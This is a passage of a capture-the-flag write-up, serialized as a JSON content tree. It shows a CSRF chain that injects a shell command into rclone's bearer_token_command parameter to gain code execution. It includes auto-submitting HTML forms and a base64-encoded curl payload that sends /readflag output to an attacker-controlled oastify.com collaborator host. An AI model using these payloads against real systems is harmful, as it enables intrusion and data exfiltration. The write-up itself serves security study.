touch${IFS}/tmp/lolipop_from_bot\n",[24148],{"type":33,"tag":105,"props":24149,"children":24150},{"__ignoreMap":8},[24151],{"type":33,"tag":128,"props":24152,"children":24153},{"class":130,"line":131},[24154,24158,24162,24166,24170,24174,24178],{"type":33,"tag":128,"props":24155,"children":24156},{"style":135},[24157],{"type":38,"value":116},{"type":33,"tag":128,"props":24159,"children":24160},{"style":151},[24161],{"type":38,"value":8707},{"type":33,"tag":128,"props":24163,"children":24164},{"style":140},[24165],{"type":38,"value":23955},{"type":33,"tag":128,"props":24167,"children":24168},{"style":312},[24169],{"type":38,"value":5720},{"type":33,"tag":128,"props":24171,"children":24172},{"style":306},[24173],{"type":38,"value":23922},{"type":33,"tag":128,"props":24175,"children":24176},{"style":312},[24177],{"type":38,"value":5730},{"type":33,"tag":128,"props":24179,"children":24180},{"style":140},[24181],{"type":38,"value":24182},"/tmp/lolipop_from_bot\n",{"type":33,"tag":47,"props":24184,"children":24185},{},[24186],{"type":38,"value":24187},"Below, find the three files that allow us to execute the command:",{"type":33,"tag":47,"props":24189,"children":24190},{},[24191],{"type":38,"value":24192},"Our index.html file 
which will contain the redirection to our two csrf:",{"type":33,"tag":114,"props":24194,"children":24195},{"lang":5929},[24196],{"type":33,"tag":119,"props":24197,"children":24199},{"code":24198,"language":5929,"meta":8,"className":5933,"style":8},"\u003C!-- index.html -->\n\u003Cscript>\n  window.open(\"/1.html\", \"_blank\");\n  setTimeout(() => {\n    window.open(\"/2.html\", \"_blank\");\n  }, 300);\n\u003C/script>\n",[24200],{"type":33,"tag":105,"props":24201,"children":24202},{"__ignoreMap":8},[24203,24210,24225,24277,24296,24347,24363],{"type":33,"tag":128,"props":24204,"children":24205},{"class":130,"line":131},[24206],{"type":33,"tag":128,"props":24207,"children":24208},{"style":5541},[24209],{"type":38,"value":21084},{"type":33,"tag":128,"props":24211,"children":24212},{"class":130,"line":362},[24213,24217,24221],{"type":33,"tag":128,"props":24214,"children":24215},{"style":312},[24216],{"type":38,"value":5977},{"type":33,"tag":128,"props":24218,"children":24219},{"style":1576},[24220],{"type":38,"value":15064},{"type":33,"tag":128,"props":24222,"children":24223},{"style":312},[24224],{"type":38,"value":6097},{"type":33,"tag":128,"props":24226,"children":24227},{"class":130,"line":403},[24228,24233,24237,24241,24245,24249,24253,24257,24261,24265,24269,24273],{"type":33,"tag":128,"props":24229,"children":24230},{"style":306},[24231],{"type":38,"value":24232},"  
window",{"type":33,"tag":128,"props":24234,"children":24235},{"style":312},[24236],{"type":38,"value":215},{"type":33,"tag":128,"props":24238,"children":24239},{"style":135},[24240],{"type":38,"value":21192},{"type":33,"tag":128,"props":24242,"children":24243},{"style":312},[24244],{"type":38,"value":5566},{"type":33,"tag":128,"props":24246,"children":24247},{"style":676},[24248],{"type":38,"value":669},{"type":33,"tag":128,"props":24250,"children":24251},{"style":140},[24252],{"type":38,"value":21205},{"type":33,"tag":128,"props":24254,"children":24255},{"style":676},[24256],{"type":38,"value":669},{"type":33,"tag":128,"props":24258,"children":24259},{"style":312},[24260],{"type":38,"value":5584},{"type":33,"tag":128,"props":24262,"children":24263},{"style":676},[24264],{"type":38,"value":679},{"type":33,"tag":128,"props":24266,"children":24267},{"style":140},[24268],{"type":38,"value":21222},{"type":33,"tag":128,"props":24270,"children":24271},{"style":676},[24272],{"type":38,"value":669},{"type":33,"tag":128,"props":24274,"children":24275},{"style":312},[24276],{"type":38,"value":5815},{"type":33,"tag":128,"props":24278,"children":24279},{"class":130,"line":739},[24280,24284,24288,24292],{"type":33,"tag":128,"props":24281,"children":24282},{"style":135},[24283],{"type":38,"value":8246},{"type":33,"tag":128,"props":24285,"children":24286},{"style":312},[24287],{"type":38,"value":8135},{"type":33,"tag":128,"props":24289,"children":24290},{"style":312},[24291],{"type":38,"value":5625},{"type":33,"tag":128,"props":24293,"children":24294},{"style":312},[24295],{"type":38,"value":762},{"type":33,"tag":128,"props":24297,"children":24298},{"class":130,"line":765},[24299,24303,24307,24311,24315,24319,24323,24327,24331,24335,24339,24343],{"type":33,"tag":128,"props":24300,"children":24301},{"style":306},[24302],{"type":38,"value":8266},{"type":33,"tag":128,"props":24304,"children":24305},{"style":312},[24306],{"type":38,"value":215},{"type":33,"tag":128,"props":24308,"chil
dren":24309},{"style":135},[24310],{"type":38,"value":21192},{"type":33,"tag":128,"props":24312,"children":24313},{"style":312},[24314],{"type":38,"value":5566},{"type":33,"tag":128,"props":24316,"children":24317},{"style":676},[24318],{"type":38,"value":669},{"type":33,"tag":128,"props":24320,"children":24321},{"style":140},[24322],{"type":38,"value":21258},{"type":33,"tag":128,"props":24324,"children":24325},{"style":676},[24326],{"type":38,"value":669},{"type":33,"tag":128,"props":24328,"children":24329},{"style":312},[24330],{"type":38,"value":5584},{"type":33,"tag":128,"props":24332,"children":24333},{"style":676},[24334],{"type":38,"value":679},{"type":33,"tag":128,"props":24336,"children":24337},{"style":140},[24338],{"type":38,"value":21222},{"type":33,"tag":128,"props":24340,"children":24341},{"style":676},[24342],{"type":38,"value":669},{"type":33,"tag":128,"props":24344,"children":24345},{"style":312},[24346],{"type":38,"value":5815},{"type":33,"tag":128,"props":24348,"children":24349},{"class":130,"line":804},[24350,24354,24359],{"type":33,"tag":128,"props":24351,"children":24352},{"style":312},[24353],{"type":38,"value":8403},{"type":33,"tag":128,"props":24355,"children":24356},{"style":523},[24357],{"type":38,"value":24358}," 300",{"type":33,"tag":128,"props":24360,"children":24361},{"style":312},[24362],{"type":38,"value":5815},{"type":33,"tag":128,"props":24364,"children":24365},{"class":130,"line":839},[24366,24370,24374],{"type":33,"tag":128,"props":24367,"children":24368},{"style":312},[24369],{"type":38,"value":6190},{"type":33,"tag":128,"props":24371,"children":24372},{"style":1576},[24373],{"type":38,"value":15064},{"type":33,"tag":128,"props":24375,"children":24376},{"style":312},[24377],{"type":38,"value":6097},{"type":33,"tag":47,"props":24379,"children":24380},{},[24381],{"type":38,"value":24382},"First CSRF allowing us to create our \"remote\" of type webdav. 
We will find the parameters we described earlier in the body in this case we need to encode it and pass it as a query parameter.",{"type":33,"tag":114,"props":24384,"children":24385},{"lang":5929},[24386],{"type":33,"tag":119,"props":24387,"children":24389},{"code":24388,"language":5929,"meta":8,"className":5933,"style":8},"\u003C!-- 1.html -->\n \u003Cform method=\"POST\" action='http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+touch${IFS}/tmp/lolipop_from_bot\"}&name=test_csrf&type=webdav'>\n  \u003Cinput type=\"submit\" value=\"CSRF\" />\n  \u003Cscript>\n    document.forms[0].submit();\n  \u003C/script>\n\u003C/form>\n",[24390],{"type":33,"tag":105,"props":24391,"children":24392},{"__ignoreMap":8},[24393,24401,24458,24515,24530,24567,24582],{"type":33,"tag":128,"props":24394,"children":24395},{"class":130,"line":131},[24396],{"type":33,"tag":128,"props":24397,"children":24398},{"style":5541},[24399],{"type":38,"value":24400},"\u003C!-- 1.html -->\n",{"type":33,"tag":128,"props":24402,"children":24403},{"class":130,"line":362},[24404,24408,24412,24417,24421,24425,24429,24433,24437,24441,24445,24450,24454],{"type":33,"tag":128,"props":24405,"children":24406},{"style":312},[24407],{"type":38,"value":9102},{"type":33,"tag":128,"props":24409,"children":24410},{"style":1576},[24411],{"type":38,"value":14844},{"type":33,"tag":128,"props":24413,"children":24414},{"style":306},[24415],{"type":38,"value":24416}," 
method",{"type":33,"tag":128,"props":24418,"children":24419},{"style":312},[24420],{"type":38,"value":315},{"type":33,"tag":128,"props":24422,"children":24423},{"style":676},[24424],{"type":38,"value":669},{"type":33,"tag":128,"props":24426,"children":24427},{"style":140},[24428],{"type":38,"value":1406},{"type":33,"tag":128,"props":24430,"children":24431},{"style":676},[24432],{"type":38,"value":669},{"type":33,"tag":128,"props":24434,"children":24435},{"style":306},[24436],{"type":38,"value":14849},{"type":33,"tag":128,"props":24438,"children":24439},{"style":312},[24440],{"type":38,"value":315},{"type":33,"tag":128,"props":24442,"children":24443},{"style":676},[24444],{"type":38,"value":6040},{"type":33,"tag":128,"props":24446,"children":24447},{"style":140},[24448],{"type":38,"value":24449},"http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+touch${IFS}/tmp/lolipop_from_bot\"}&name=test_csrf&type=webdav",{"type":33,"tag":128,"props":24451,"children":24452},{"style":676},[24453],{"type":38,"value":6040},{"type":33,"tag":128,"props":24455,"children":24456},{"style":312},[24457],{"type":38,"value":6097},{"type":33,"tag":128,"props":24459,"children":24460},{"class":130,"line":403},[24461,24465,24469,24473,24477,24481,24485,24489,24493,24497,24501,24506,24510],{"type":33,"tag":128,"props":24462,"children":24463},{"style":312},[24464],{"type":38,"value":6067},{"type":33,"tag":128,"props":24466,"children":24467},{"style":1576},[24468],{"type":38,"value":14882},{"type":33,"tag":128,"props":24470,"children":24471},{"style":306},[24472],{"type":38,"value":14887},{"type":33,"tag":128,"props":24474,"children":24475},{"style":312},[24476],{"type":38,"value":315},{"type":33,"tag":128,"props":24478,"children":24479},{"style":676},[24480],{"type":38,"value":669},{"type":33,"tag":128,"props":24482,"children":24483},{"style":140},[24484],{"type":38,"value":14977},{"type":33,"tag":128,"props":24486,"chi
ldren":24487},{"style":676},[24488],{"type":38,"value":669},{"type":33,"tag":128,"props":24490,"children":24491},{"style":306},[24492],{"type":38,"value":13031},{"type":33,"tag":128,"props":24494,"children":24495},{"style":312},[24496],{"type":38,"value":315},{"type":33,"tag":128,"props":24498,"children":24499},{"style":676},[24500],{"type":38,"value":669},{"type":33,"tag":128,"props":24502,"children":24503},{"style":140},[24504],{"type":38,"value":24505},"CSRF",{"type":33,"tag":128,"props":24507,"children":24508},{"style":676},[24509],{"type":38,"value":669},{"type":33,"tag":128,"props":24511,"children":24512},{"style":312},[24513],{"type":38,"value":24514}," />\n",{"type":33,"tag":128,"props":24516,"children":24517},{"class":130,"line":739},[24518,24522,24526],{"type":33,"tag":128,"props":24519,"children":24520},{"style":312},[24521],{"type":38,"value":6067},{"type":33,"tag":128,"props":24523,"children":24524},{"style":1576},[24525],{"type":38,"value":15064},{"type":33,"tag":128,"props":24527,"children":24528},{"style":312},[24529],{"type":38,"value":6097},{"type":33,"tag":128,"props":24531,"children":24532},{"class":130,"line":765},[24533,24538,24542,24547,24551,24555,24559,24563],{"type":33,"tag":128,"props":24534,"children":24535},{"style":306},[24536],{"type":38,"value":24537},"    
document",{"type":33,"tag":128,"props":24539,"children":24540},{"style":312},[24541],{"type":38,"value":215},{"type":33,"tag":128,"props":24543,"children":24544},{"style":306},[24545],{"type":38,"value":24546},"forms",{"type":33,"tag":128,"props":24548,"children":24549},{"style":312},[24550],{"type":38,"value":344},{"type":33,"tag":128,"props":24552,"children":24553},{"style":523},[24554],{"type":38,"value":10442},{"type":33,"tag":128,"props":24556,"children":24557},{"style":312},[24558],{"type":38,"value":8230},{"type":33,"tag":128,"props":24560,"children":24561},{"style":135},[24562],{"type":38,"value":14977},{"type":33,"tag":128,"props":24564,"children":24565},{"style":312},[24566],{"type":38,"value":15496},{"type":33,"tag":128,"props":24568,"children":24569},{"class":130,"line":804},[24570,24574,24578],{"type":33,"tag":128,"props":24571,"children":24572},{"style":312},[24573],{"type":38,"value":6206},{"type":33,"tag":128,"props":24575,"children":24576},{"style":1576},[24577],{"type":38,"value":15064},{"type":33,"tag":128,"props":24579,"children":24580},{"style":312},[24581],{"type":38,"value":6097},{"type":33,"tag":128,"props":24583,"children":24584},{"class":130,"line":839},[24585,24589,24593],{"type":33,"tag":128,"props":24586,"children":24587},{"style":312},[24588],{"type":38,"value":6190},{"type":33,"tag":128,"props":24590,"children":24591},{"style":1576},[24592],{"type":38,"value":14844},{"type":33,"tag":128,"props":24594,"children":24595},{"style":312},[24596],{"type":38,"value":6097},{"type":33,"tag":47,"props":24598,"children":24599},{},[24600,24602,24608],{"type":38,"value":24601},"The second CSRF allows listing the files present in ",{"type":33,"tag":105,"props":24603,"children":24605},{"className":24604},[],[24606],{"type":38,"value":24607},"remote",{"type":38,"value":24609},", this action will then trigger our command passed as a parameter in the previous 
CSRF",{"type":33,"tag":114,"props":24611,"children":24612},{"lang":5929},[24613],{"type":33,"tag":119,"props":24614,"children":24616},{"code":24615,"language":5929,"meta":8,"className":5933,"style":8},"\u003C!-- 2.html -->\n\u003Cform method=\"POST\" action='http://rclone:5572/operations/list?fs=test_csrf:&remote='>\n  \u003Cinput type=\"submit\" value=\"CSRF\" />\n  \u003Cscript>\n    document.forms[0].submit();\n  \u003C/script>\n\u003C/form>\n",[24617],{"type":33,"tag":105,"props":24618,"children":24619},{"__ignoreMap":8},[24620,24628,24684,24739,24754,24789,24804],{"type":33,"tag":128,"props":24621,"children":24622},{"class":130,"line":131},[24623],{"type":33,"tag":128,"props":24624,"children":24625},{"style":5541},[24626],{"type":38,"value":24627},"\u003C!-- 2.html -->\n",{"type":33,"tag":128,"props":24629,"children":24630},{"class":130,"line":362},[24631,24635,24639,24643,24647,24651,24655,24659,24663,24667,24671,24676,24680],{"type":33,"tag":128,"props":24632,"children":24633},{"style":312},[24634],{"type":38,"value":5977},{"type":33,"tag":128,"props":24636,"children":24637},{"style":1576},[24638],{"type":38,"value":14844},{"type":33,"tag":128,"props":24640,"children":24641},{"style":306},[24642],{"type":38,"value":24416},{"type":33,"tag":128,"props":24644,"children":24645},{"style":312},[24646],{"type":38,"value":315},{"type":33,"tag":128,"props":24648,"children":24649},{"style":676},[24650],{"type":38,"value":669},{"type":33,"tag":128,"props":24652,"children":24653},{"style":140},[24654],{"type":38,"value":1406},{"type":33,"tag":128,"props":24656,"children":24657},{"style":676},[24658],{"type":38,"value":669},{"type":33,"tag":128,"props":24660,"children":24661},{"style":306},[24662],{"type":38,"value":14849},{"type":33,"tag":128,"props":24664,"children":24665},{"style":312},[24666],{"type":38,"value":315},{"type":33,"tag":128,"props":24668,"children":24669},{"style":676},[24670],{"type":38,"value":6040},{"type":33,"tag":128,"props":24672,"children":24673},{
"style":140},[24674],{"type":38,"value":24675},"http://rclone:5572/operations/list?fs=test_csrf:&remote=",{"type":33,"tag":128,"props":24677,"children":24678},{"style":676},[24679],{"type":38,"value":6040},{"type":33,"tag":128,"props":24681,"children":24682},{"style":312},[24683],{"type":38,"value":6097},{"type":33,"tag":128,"props":24685,"children":24686},{"class":130,"line":403},[24687,24691,24695,24699,24703,24707,24711,24715,24719,24723,24727,24731,24735],{"type":33,"tag":128,"props":24688,"children":24689},{"style":312},[24690],{"type":38,"value":6067},{"type":33,"tag":128,"props":24692,"children":24693},{"style":1576},[24694],{"type":38,"value":14882},{"type":33,"tag":128,"props":24696,"children":24697},{"style":306},[24698],{"type":38,"value":14887},{"type":33,"tag":128,"props":24700,"children":24701},{"style":312},[24702],{"type":38,"value":315},{"type":33,"tag":128,"props":24704,"children":24705},{"style":676},[24706],{"type":38,"value":669},{"type":33,"tag":128,"props":24708,"children":24709},{"style":140},[24710],{"type":38,"value":14977},{"type":33,"tag":128,"props":24712,"children":24713},{"style":676},[24714],{"type":38,"value":669},{"type":33,"tag":128,"props":24716,"children":24717},{"style":306},[24718],{"type":38,"value":13031},{"type":33,"tag":128,"props":24720,"children":24721},{"style":312},[24722],{"type":38,"value":315},{"type":33,"tag":128,"props":24724,"children":24725},{"style":676},[24726],{"type":38,"value":669},{"type":33,"tag":128,"props":24728,"children":24729},{"style":140},[24730],{"type":38,"value":24505},{"type":33,"tag":128,"props":24732,"children":24733},{"style":676},[24734],{"type":38,"value":669},{"type":33,"tag":128,"props":24736,"children":24737},{"style":312},[24738],{"type":38,"value":24514},{"type":33,"tag":128,"props":24740,"children":24741},{"class":130,"line":739},[24742,24746,24750],{"type":33,"tag":128,"props":24743,"children":24744},{"style":312},[24745],{"type":38,"value":6067},{"type":33,"tag":128,"props":24747,"c
hildren":24748},{"style":1576},[24749],{"type":38,"value":15064},{"type":33,"tag":128,"props":24751,"children":24752},{"style":312},[24753],{"type":38,"value":6097},{"type":33,"tag":128,"props":24755,"children":24756},{"class":130,"line":765},[24757,24761,24765,24769,24773,24777,24781,24785],{"type":33,"tag":128,"props":24758,"children":24759},{"style":306},[24760],{"type":38,"value":24537},{"type":33,"tag":128,"props":24762,"children":24763},{"style":312},[24764],{"type":38,"value":215},{"type":33,"tag":128,"props":24766,"children":24767},{"style":306},[24768],{"type":38,"value":24546},{"type":33,"tag":128,"props":24770,"children":24771},{"style":312},[24772],{"type":38,"value":344},{"type":33,"tag":128,"props":24774,"children":24775},{"style":523},[24776],{"type":38,"value":10442},{"type":33,"tag":128,"props":24778,"children":24779},{"style":312},[24780],{"type":38,"value":8230},{"type":33,"tag":128,"props":24782,"children":24783},{"style":135},[24784],{"type":38,"value":14977},{"type":33,"tag":128,"props":24786,"children":24787},{"style":312},[24788],{"type":38,"value":15496},{"type":33,"tag":128,"props":24790,"children":24791},{"class":130,"line":804},[24792,24796,24800],{"type":33,"tag":128,"props":24793,"children":24794},{"style":312},[24795],{"type":38,"value":6206},{"type":33,"tag":128,"props":24797,"children":24798},{"style":1576},[24799],{"type":38,"value":15064},{"type":33,"tag":128,"props":24801,"children":24802},{"style":312},[24803],{"type":38,"value":6097},{"type":33,"tag":128,"props":24805,"children":24806},{"class":130,"line":839},[24807,24811,24815],{"type":33,"tag":128,"props":24808,"children":24809},{"style":312},[24810],{"type":38,"value":6190},{"type":33,"tag":128,"props":24812,"children":24813},{"style":1576},[24814],{"type":38,"value":14844},{"type":33,"tag":128,"props":24816,"children":24817},{"style":312},[24818],{"type":38,"value":6097},{"type":33,"tag":47,"props":24820,"children":24821},{},[24822],{"type":38,"value":24823},"If we go to 
the dashboard we can see that a new remote has been created named \"CSRF\".",{"type":33,"tag":75,"props":24825,"children":24827},{"imgSrc":24826},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721252881/writeups/rclone_dashboard.webp",[],{"type":33,"tag":47,"props":24829,"children":24830},{},[24831],{"type":38,"value":24832},"Also, we can see that in the /tmp folder a file named lolipop_from_bot has indeed been created",{"type":33,"tag":75,"props":24834,"children":24836},{"imgSrc":24835},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721252881/writeups/ls_tmp_from_bot.webp",[],{"type":33,"tag":47,"props":24838,"children":24839},{},[24840],{"type":38,"value":24841},"Now that we have a working PoC of the RCE via the bot, another problem arises: we cannot retrieve the flag directly from the rclone container because it has no internet access. However, the rclone service sits on the same internal network as the bot, and the bot does have egress. We will therefore pivot through the bot and make it forward the flag to us.",{"type":33,"tag":40,"props":24843,"children":24844},{"id":21053},[24845],{"type":38,"value":21056},{"type":33,"tag":47,"props":24847,"children":24848},{},[24849],{"type":38,"value":24850},"As previously mentioned, our final bash payload will look like this:\nFrom inside the rclone container it POSTs to the bot's /submit endpoint, passing as the url parameter an attacker-controlled collaborator URL with the base64-encoded output of /readflag appended as a query parameter. When the bot then visits that URL, the flag appears in the request log of our collaborator host.",{"type":33,"tag":114,"props":24852,"children":24853},{"lang":116},[24854],{"type":33,"tag":119,"props":24855,"children":24857},{"code":24856,"language":116,"meta":8,"className":121,"style":8},"curl -H \"Content-type: application/x-www-form-urlencoded\" -d \"url=https://r7z7f6ul1nguh27mf65wveqeu500osch.oastify.com/?flag=$(/readflag | base64)\" 
http://bot:8000/submit\n",[24858],{"type":33,"tag":105,"props":24859,"children":24860},{"__ignoreMap":8},[24861],{"type":33,"tag":128,"props":24862,"children":24863},{"class":130,"line":131},[24864,24868,24873,24877,24882,24886,24891,24895,24900,24904,24908,24912,24916,24920,24924],{"type":33,"tag":128,"props":24865,"children":24866},{"style":135},[24867],{"type":38,"value":2882},{"type":33,"tag":128,"props":24869,"children":24870},{"style":151},[24871],{"type":38,"value":24872}," -H",{"type":33,"tag":128,"props":24874,"children":24875},{"style":676},[24876],{"type":38,"value":679},{"type":33,"tag":128,"props":24878,"children":24879},{"style":140},[24880],{"type":38,"value":24881},"Content-type: application/x-www-form-urlencoded",{"type":33,"tag":128,"props":24883,"children":24884},{"style":676},[24885],{"type":38,"value":669},{"type":33,"tag":128,"props":24887,"children":24888},{"style":151},[24889],{"type":38,"value":24890}," -d",{"type":33,"tag":128,"props":24892,"children":24893},{"style":676},[24894],{"type":38,"value":679},{"type":33,"tag":128,"props":24896,"children":24897},{"style":140},[24898],{"type":38,"value":24899},"url=https://r7z7f6ul1nguh27mf65wveqeu500osch.oastify.com/?flag=",{"type":33,"tag":128,"props":24901,"children":24902},{"style":312},[24903],{"type":38,"value":2953},{"type":33,"tag":128,"props":24905,"children":24906},{"style":135},[24907],{"type":38,"value":5294},{"type":33,"tag":128,"props":24909,"children":24910},{"style":300},[24911],{"type":38,"value":10195},{"type":33,"tag":128,"props":24913,"children":24914},{"style":135},[24915],{"type":38,"value":10200},{"type":33,"tag":128,"props":24917,"children":24918},{"style":312},[24919],{"type":38,"value":2966},{"type":33,"tag":128,"props":24921,"children":24922},{"style":676},[24923],{"type":38,"value":669},{"type":33,"tag":128,"props":24925,"children":24926},{"style":140},[24927],{"type":38,"value":24928}," 
http://bot:8000/submit\n",{"type":33,"tag":47,"props":24930,"children":24931},{},[24932],{"type":38,"value":24933},"For more flexibility, we will encode our payload in base64 and pass it in a bash command like this:",{"type":33,"tag":114,"props":24935,"children":24936},{"lang":116},[24937],{"type":33,"tag":119,"props":24938,"children":24940},{"code":24939,"language":116,"meta":8,"className":121,"style":8},"bash -c \"echo Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d | base64 -d |bash\"\n",[24941],{"type":33,"tag":105,"props":24942,"children":24943},{"__ignoreMap":8},[24944],{"type":33,"tag":128,"props":24945,"children":24946},{"class":130,"line":131},[24947,24951,24955,24959,24964],{"type":33,"tag":128,"props":24948,"children":24949},{"style":135},[24950],{"type":38,"value":116},{"type":33,"tag":128,"props":24952,"children":24953},{"style":151},[24954],{"type":38,"value":8707},{"type":33,"tag":128,"props":24956,"children":24957},{"style":676},[24958],{"type":38,"value":679},{"type":33,"tag":128,"props":24960,"children":24961},{"style":140},[24962],{"type":38,"value":24963},"echo Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d | base64 -d |bash",{"type":33,"tag":128,"props":24965,"children":24966},{"style":676},[24967],{"type":38,"value":836},{"type":33,"tag":47,"props":24969,"children":24970},{},[24971],{"type":38,"value":24972},"Our final payload, fully encoded and used in our CSRF, will look like this:",{"type":33,"tag":114,"props":24974,"children":24975},{"lang":5929},[24976],{"type":33,"tag":119,"props":24977,"children":24979},{"code":24978,"language":5929,"meta":8,"className":5933,"style":8},"\u003Cform 
method=\"POST\" action='http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+echo${IFS}Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d|${IFS}base64${IFS}-d|${IFS}bash\"}&name=csrf&type=webdav'>\n  \u003Cinput type=\"submit\" value=\"CSRF\" />\n  \u003Cscript>\n    document.forms[0].submit();\n  \u003C/script>\n\u003C/form>\n",[24980],{"type":33,"tag":105,"props":24981,"children":24982},{"__ignoreMap":8},[24983,25039,25094,25109,25144,25159],{"type":33,"tag":128,"props":24984,"children":24985},{"class":130,"line":131},[24986,24990,24994,24998,25002,25006,25010,25014,25018,25022,25026,25031,25035],{"type":33,"tag":128,"props":24987,"children":24988},{"style":312},[24989],{"type":38,"value":5977},{"type":33,"tag":128,"props":24991,"children":24992},{"style":1576},[24993],{"type":38,"value":14844},{"type":33,"tag":128,"props":24995,"children":24996},{"style":306},[24997],{"type":38,"value":24416},{"type":33,"tag":128,"props":24999,"children":25000},{"style":312},[25001],{"type":38,"value":315},{"type":33,"tag":128,"props":25003,"children":25004},{"style":676},[25005],{"type":38,"value":669},{"type":33,"tag":128,"props":25007,"children":25008},{"style":140},[25009],{"type":38,"value":1406},{"type":33,"tag":128,"props":25011,"children":25012},{"style":676},[25013],{"type":38,"value":669},{"type":33,"tag":128,"props":25015,"children":25016},{"style":306},[25017],{"type":38,"value":14849},{"type":33,"tag":128,"props":25019,"children":25020},{"style":312},[25021],{"type":38,"value":315},{"type":33,"tag":128,"props":25023,"children":25024},{"style":676},[25025],{"type":38,"value":6040},{"type":33,"tag":128,"props":25027,"children":25028},{"style":140},[25029],{"type":38,"value":25030},"http://rclone:5572/config/create?pa
rameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+echo${IFS}Y3VybCAtSCAiQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIC1kICJ1cmw9aHR0cHM6Ly9yN3o3ZjZ1bDFuZ3VoMjdtZjY1d3ZlcWV1NTAwb3NjaC5vYXN0aWZ5LmNvbS8/ZmxhZz0kKC9yZWFkZmxhZyB8IGJhc2U2NCkiIGh0dHA6Ly9ib3Q6ODAwMC9zdWJtaXQ%3d|${IFS}base64${IFS}-d|${IFS}bash\"}&name=csrf&type=webdav",{"type":33,"tag":128,"props":25032,"children":25033},{"style":676},[25034],{"type":38,"value":6040},{"type":33,"tag":128,"props":25036,"children":25037},{"style":312},[25038],{"type":38,"value":6097},{"type":33,"tag":128,"props":25040,"children":25041},{"class":130,"line":362},[25042,25046,25050,25054,25058,25062,25066,25070,25074,25078,25082,25086,25090],{"type":33,"tag":128,"props":25043,"children":25044},{"style":312},[25045],{"type":38,"value":6067},{"type":33,"tag":128,"props":25047,"children":25048},{"style":1576},[25049],{"type":38,"value":14882},{"type":33,"tag":128,"props":25051,"children":25052},{"style":306},[25053],{"type":38,"value":14887},{"type":33,"tag":128,"props":25055,"children":25056},{"style":312},[25057],{"type":38,"value":315},{"type":33,"tag":128,"props":25059,"children":25060},{"style":676},[25061],{"type":38,"value":669},{"type":33,"tag":128,"props":25063,"children":25064},{"style":140},[25065],{"type":38,"value":14977},{"type":33,"tag":128,"props":25067,"children":25068},{"style":676},[25069],{"type":38,"value":669},{"type":33,"tag":128,"props":25071,"children":25072},{"style":306},[25073],{"type":38,"value":13031},{"type":33,"tag":128,"props":25075,"children":25076},{"style":312},[25077],{"type":38,"value":315},{"type":33,"tag":128,"props":25079,"children":25080},{"style":676},[25081],{"type":38,"value":669},{"type":33,"tag":128,"props":25083,"children":25084},{"style":140},[25085],{"type":38,"value":24505},{"type":33,"tag":128,"props":25087,"children":25088},{"style":676},[25089],{"type":38,"value":669},{"type":33,"tag":128,"props":25091,"children":25
092},{"style":312},[25093],{"type":38,"value":24514},{"type":33,"tag":128,"props":25095,"children":25096},{"class":130,"line":403},[25097,25101,25105],{"type":33,"tag":128,"props":25098,"children":25099},{"style":312},[25100],{"type":38,"value":6067},{"type":33,"tag":128,"props":25102,"children":25103},{"style":1576},[25104],{"type":38,"value":15064},{"type":33,"tag":128,"props":25106,"children":25107},{"style":312},[25108],{"type":38,"value":6097},{"type":33,"tag":128,"props":25110,"children":25111},{"class":130,"line":739},[25112,25116,25120,25124,25128,25132,25136,25140],{"type":33,"tag":128,"props":25113,"children":25114},{"style":306},[25115],{"type":38,"value":24537},{"type":33,"tag":128,"props":25117,"children":25118},{"style":312},[25119],{"type":38,"value":215},{"type":33,"tag":128,"props":25121,"children":25122},{"style":306},[25123],{"type":38,"value":24546},{"type":33,"tag":128,"props":25125,"children":25126},{"style":312},[25127],{"type":38,"value":344},{"type":33,"tag":128,"props":25129,"children":25130},{"style":523},[25131],{"type":38,"value":10442},{"type":33,"tag":128,"props":25133,"children":25134},{"style":312},[25135],{"type":38,"value":8230},{"type":33,"tag":128,"props":25137,"children":25138},{"style":135},[25139],{"type":38,"value":14977},{"type":33,"tag":128,"props":25141,"children":25142},{"style":312},[25143],{"type":38,"value":15496},{"type":33,"tag":128,"props":25145,"children":25146},{"class":130,"line":765},[25147,25151,25155],{"type":33,"tag":128,"props":25148,"children":25149},{"style":312},[25150],{"type":38,"value":6206},{"type":33,"tag":128,"props":25152,"children":25153},{"style":1576},[25154],{"type":38,"value":15064},{"type":33,"tag":128,"props":25156,"children":25157},{"style":312},[25158],{"type":38,"value":6097},{"type":33,"tag":128,"props":25160,"children":25161},{"class":130,"line":804},[25162,25166,25170],{"type":33,"tag":128,"props":25163,"children":25164},{"style":312},[25165],{"type":38,"value":6190},{"type":33,"tag":1
